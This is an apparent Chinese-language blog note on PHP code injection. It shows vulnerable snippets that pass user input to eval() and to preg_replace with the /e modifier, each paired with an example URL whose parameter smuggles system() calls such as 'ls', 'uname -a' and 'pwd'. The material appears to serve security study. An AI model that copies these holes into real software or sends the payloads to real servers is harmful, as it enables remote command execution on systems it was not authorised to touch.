Code injection
// 风险代码 // 用户来决定eval执行的代码内容 eval($_GET['name']); // http://vulnerable/codeexec/example1.php?name=";system('ls');" // http://vulnerable/codeexec/example1.php?name=".system('uname -a'); $dummy=" $order = $_GET['order']; // http://vulnerable/codeexec/example2.php?order=id);}system('pwd');// 这个好像不行 echo preg_replace($_GET['pattern'], $_GET['new'], $_GET['base']); // http://vulnerable/codeexec/example3.php?new=system('uname -a')&pattern=/lamer/e&base=Hello lamer
没有评论:
发表评论